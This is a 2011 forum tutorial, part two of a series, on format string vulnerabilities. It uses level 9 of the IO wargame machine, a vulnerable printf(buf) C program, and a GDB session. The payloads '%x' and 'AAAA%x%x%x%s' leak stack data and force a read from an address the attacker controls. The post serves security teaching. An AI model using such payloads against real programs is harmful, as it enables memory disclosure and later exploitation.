Go4Expert

Go4Expert (http://www.go4expert.com/)
-   Ethical hacking Tips (http://www.go4expert.com/articles/ethical-hacking-tutorials/)
-   -   Understanding Format Strings and Their Vulnerbilities - Part 2 (http://www.go4expert.com/articles/understanding-format-strings-t25039/)

lionaneesh 21Feb2011 17:52

Understanding Format Strings and Their Vulnerbilities - Part 2
 
This is a continuation of my previous article on format string vulnerbilities..I suggest a glance over it before reading further..

In this tutorial we'll be see how do we display a string(data) at a particular address..

We'll be using a IO Hacking Challenge Machine for testing our vulnerbility...

Code:

______  _____

/\__  _\ /\  __`\

\/_/\ \/ \ \ \/\ \      Levels are in /levels

  \ \ \  \ \ \ \ \    Passes are in ~/.pass

    \_\ \__\ \ \_\ \

    /\_____\\ \_____\  Server admin: beach (beach@smashthestack.org)

    \/_____/ \/_____/  Server janitor: bla



        1. No DoS, local or otherwise

        2. Do not try to connect to remote systems from this box

        3. Only two connections per IP are allowed

        4. Quotas are in place so don't waste resources

        5. This rules list is not all inclusive and is subject to change

        6. Have fuN++



                                (28 levels)



- use long(>5char) names in /tmp, short stuff is periodically deleted, as are

easily guessable ones

- o and feel free to leave your email in /home/email.list (it's writeonly)



-  Thanks everybody for the new translations!



level9@io:~$

Exploiting



Lets first take a look at the vulnerable program :-

Code:

#include <stdio.h>

#include <string.h>



int main(int argc, char **argv) {

        int  pad = 0xbabe;

        char buf[1024];

        strncpy(buf, argv[1], sizeof(buf) - 1);



        printf(buf);

       

        return 0;

}

Running :-

Code:

level9@io:/levels$ ./level09 Hey

Heylevel9@io:/levels$

Yeah , Its running fine...Now lets test it with some malicious input..

Code:

bfffde96 3ff bfffd910level9@io:/levels$ ./level09 "%x %x %x "

bfffde95 3ff bfffd910 level9@io:/levels$

Yeah... That is a proof of its vulnerable...We just poped out some addresses on the stack..

Now lets just fire up GDB and see whats happening :-

Code:

level9@io:/levels$ gdb ./level09

GNU gdb 6.8-debian

Copyright (C) 2008 Free Software Foundation, Inc.

License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

This is free software: you are free to change and redistribute it.

There is NO WARRANTY, to the extent permitted by law.  Type "show copying"

and "show warranty" for details.

This GDB was configured as "i486-linux-gnu"...

(gdb)

lets add a breakpoint at the start of the program :-

Code:

(gdb) break main

Breakpoint 1 at 0x80483ad

(gdb)

Lets run now

Code:

(gdb) run "%x %x"

The program being debugged has been started already.

Start it from the beginning? (y or n) y

Starting program: /levels/level09 "%x %x"



Breakpoint 1, 0x080483ad in main ()

(gdb)


Lets run it with some malicious inputs and see whats happening

Code:

(gdb) run "AAAA%x%x%x%x%x%x%x%x"

Starting program: /levels/level09 "AAAA%x%x%x%x%x%x%x%x"



Breakpoint 1, 0x080483ad in main ()

(gdb) continue

Continuing.

AAAAbfffde813ffbfffd9004141414178257825782578257825782578257825

Program exited normally.

WoW!! Thats interesting...We got a 41414141 in the middle..

Now lets just reduce the pop's (%x) and let AAAA be the top of the stack So that we can read from it!!

Code:

(gdb) run "AAAA%x%x%x"

The program being debugged has been started already.

Start it from the beginning? (y or n) y



Starting program: /levels/level09 "AAAA%x%x%x"



Breakpoint 1, 0x080483ad in main ()

(gdb) continue

Continuing.

AAAAbfffde8b3ffbfffd900

Program exited normally.

(gdb)

Ok Thats look great..
Lets now try and read..

Code:

(gdb) run "AAAA%x%x%x%s"

The program being debugged has been started already.

Start it from the beginning? (y or n) y



Starting program: /levels/level09 "AAAA%x%x%x%s"



Breakpoint 1, 0x080483ad in main ()

(gdb) continue

Continuing.



Program received signal SIGSEGV, Segmentation fault.

0x0019070b in strlen () from /lib/libc.so.6

0x41414141 ???
(gdb)

Wow!! Boom..
And we did it.. We made the program read a memory address I.e 0x41414141 it failed because the memory address does'nt exists

Thats all for this article..Stay tuned for more..

lionaneesh 22Feb2011 12:29

Re: Understanding Format Strings and Their Vulnerbilities - Part 2
 
Thanks for accepting..
And i hope viewers could get something out of this!!


All times are GMT +5.5. The time now is 21:31.